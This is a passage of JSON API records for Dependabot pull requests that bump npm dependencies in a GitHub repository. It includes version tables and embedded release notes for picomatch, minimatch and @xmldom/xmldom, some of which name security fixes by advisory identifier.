href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.1.2...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/BenRogersWPG/update-issue-body/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/BenRogersWPG/update-issue-body/pull/10","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/BenRogersWPG%2Fupdate-issue-body/issues/10","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10/packages"},{"uuid":"4184031634","node_id":"PR_kwDOJkwVw87PI3BE","number":14,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 36 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-07T04:59:06.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-01T04:43:43.000Z","updated_at":"2026-04-07T04:59:07.000Z","time_to_close":519323,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":36,"packages":[{"name":"@xmldom/xmldom","old_version":"0.8.7","new_version":"0.8.12","repository_url":"https://github.com/xmldom/xmldom"},{"name":"fast-xml-parser","old_version":"4.2.2","new_version":"5.5.9","repository_url":"https://github.com/NaturalIntelligence/fast-xml-parser"},{"name":"glob","old_version":"10.2.3","new_version":"10.5.0","repository_url":"https://github.com/isaacs/node-glob"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"jsonpath","old_version":"1.1.1","new_version":"1.3.0","repository_url":"https://github.com/dchester/jsonpath"},{"name":"path-to-regexp","old_version":"6.2.1","new_version":"6.3.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"path-to-regexp","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"express","old_version":"4.18.2","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"form-data","old_version":"4.0.0","new_version":"4.0.4","repository_url":"https://github.com/form-data/form-data"},{"name":"gatsby","old_version":"4.23.1","new_version":"4.25.9","repository_url":"https://github.com/gatsbyjs/gatsby"},{"name":"@babel/runtime-corejs3","old_version":"7.13.9","new_version":"7.29.2","repository_url":"https://github.com/babel/babel"},{"name":"@babel/traverse","old_version":"7.21.5","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.17.0","new_version":"11.4.4-cjs.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"brace-expansion","old_version":"1.1.8","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"flatted","old_version":"3.2.2","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"follow-redirects","old_version":"1.15.2","new_version":"1.15.11","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"socket.io-parser","old_version":"3.3.3","new_version":"3.3.5","repository_url":"https://github.com/socketio/socket.io"},{"name":"get-func-name","old_version":"2.0.0","new_version":"2.0.2","repository_url":"https://github.com/chaijs/get-func-name"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"jws","old_version":"3.2.2","new_version":"3.2.3","repository_url":"https://github.com/brianloveswords/node-jws"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"postcss","old_version":"8.3.11","new_version":"8.5.8","repository_url":"https://github.com/postcss/postcss"},{"name":"sharp","old_version":"0.30.7","new_version":"0.32.6","repository_url":"https://github.com/lovell/sharp"},{"name":"svgo","old_version":"2.8.0","new_version":"2.8.2","repository_url":"https://github.com/svg/svgo"},{"name":"word-wrap","old_version":"1.2.3","new_version":"1.2.5","repository_url":"https://github.com/jonschlinkert/word-wrap"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 26 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.8.7` | `0.8.12` |\n| [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) | `4.2.2` | `5.5.9` |\n| [glob](https://github.com/isaacs/node-glob) | `10.2.3` | `10.5.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [jsonpath](https://github.com/dchester/jsonpath) | `1.1.1` | `1.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `6.2.1` | `6.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `1.8.0` | `1.9.0` |\n| [express](https://github.com/expressjs/express) | `4.18.2` | `4.22.1` |\n| [form-data](https://github.com/form-data/form-data) | `4.0.0` | `4.0.4` |\n| [gatsby](https://github.com/gatsbyjs/gatsby) | `4.23.1` | `4.25.9` |\n| [@babel/runtime-corejs3](https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3) | `7.13.9` | `7.29.2` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.21.5` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `11.4.4-cjs.2` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.8` | `1.1.13` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.2` | `3.4.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.2` | `1.15.11` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `3.3.3` | `3.3.5` |\n| [get-func-name](https://github.com/chaijs/get-func-name) | `2.0.0` | `2.0.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [jws](https://github.com/brianloveswords/node-jws) | `3.2.2` | `3.2.3` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [postcss](https://github.com/postcss/postcss) | `8.3.11` | `8.5.8` |\n| [sharp](https://github.com/lovell/sharp) | `0.30.7` | `0.32.6` |\n| [svgo](https://github.com/svg/svgo) | `2.8.0` | `2.8.2` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 1 update in the /.github/actions/close-bot directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `@xmldom/xmldom` from 0.8.7 to 0.8.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/releases\"\u003e\u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.8.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/discussions/357\"\u003ehttps://github.com/xmldom/xmldom/discussions/357\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.8.11\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.10\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.9...0.8.10\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edom: prevent iteration over deleted items \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/514\"\u003e\u003ccode\u003e[#514](https://github.com/xmldom/xmldom/issues/514)\u003c/code\u003e\u003c/a\u003e/ \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/499\"\u003e\u003ccode\u003e[#499](https://github.com/xmldom/xmldom/issues/499)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/qtow\"\u003e\u003ccode\u003e@​qtow\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.9\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.8...0.8.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSet nodeName property in ProcessingInstruction \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/509\"\u003e\u003ccode\u003e[#509](https://github.com/xmldom/xmldom/issues/509)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/505\"\u003e\u003ccode\u003e[#505](https://github.com/xmldom/xmldom/issues/505)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/cjbarth\"\u003e\u003ccode\u003e@​cjbarth\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.8\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.7...0.8.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md\"\u003e\u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003e0.8.12\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.8...0.9.7\"\u003e0.9.8\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: replace \\u2029 as part of normalizeLineEndings \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/839\"\u003e\u003ccode\u003e[#839](https://github.com/xmldom/xmldom/issues/839)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/838\"\u003e\u003ccode\u003e[#838](https://github.com/xmldom/xmldom/issues/838)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eperf: speed up line detection \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/847\"\u003e\u003ccode\u003e[#847](https://github.com/xmldom/xmldom/issues/847)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/838\"\u003e\u003ccode\u003e[#838](https://github.com/xmldom/xmldom/issues/838)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdated dependencies\u003c/li\u003e\n\u003cli\u003edrop jazzer and rxjs devDependencies \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/845\"\u003e\u003ccode\u003e[#845](https://github.com/xmldom/xmldom/issues/845)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca 